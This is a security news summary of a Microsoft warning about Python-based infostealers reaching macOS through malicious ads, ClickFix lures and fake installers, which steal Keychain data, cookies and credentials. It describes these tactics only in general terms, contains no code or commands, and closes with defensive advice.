Microsoft has highlighted a significant increase in information-stealing malware targeting macOS by using cross-platform languages like Python to expand beyond Windows. These campaigns frequently use deceptive social engineering and malicious advertisements to trick users into installing malware that harvests sensitive data, including browser credentials and cryptocurrency information.

Microsoft security researchers have identified a growing trend where cybercriminals are moving beyond their traditional focus on Windows to target macOS users with sophisticated data-theft tools. By using cross-platform programming languages like Python, attackers can quickly adapt their code to different operating systems with very little effort. These campaigns often rely on social engineering tactics, such as the ClickFix lure, to convince users to download and run malicious installers that appear to be legitimate software or system updates.

Once a system is infected, these stealers use native macOS utilities and automation scripts to bypass security measures and operate without leaving a significant footprint. The malware is designed to target a wide range of sensitive information, including iCloud Keychain data, session cookies, and developer credentials. Attackers have also been observed using popular communication platforms like Telegram and WhatsApp to manage their operations and exfiltrate the stolen data to private servers.

A common entry point for these attacks is malvertising, where fraudulent ads for popular tools or artificial intelligence software appear in search engine results. When a user clicks these ads, they are redirected to deceptive websites that prompt them to download disk image files containing malware families like Atomic macOS Stealer. Some campaigns even use fake PDF editors or productivity tools to gain a foothold, demonstrating the variety of disguises these threats can take to avoid detection.

The impact of these attacks is widespread, as seen in specific campaigns like PXA Stealer, which focuses on harvesting financial details and browser data for fraudulent use. These threat actors often maintain persistence on a device by setting up scheduled tasks or registry keys that allow the malware to continue running even after a system restart. This persistent access enables attackers to move laterally through corporate networks, potentially leading to larger data breaches or ransomware deployments.

To defend against these evolving threats, security experts recommend that organizations focus on user education regarding the dangers of suspicious downloads and fake browser prompts. Monitoring for unusual terminal activity and unauthorized access to sensitive system files like the Keychain is also essential. By inspecting network traffic for suspicious data transmissions and staying vigilant against search engine poisoning, users can better protect their personal and professional information from being compromised.

Source: Microsoft Warns Python Infostealers Target macOS Via Fake Ads And Installers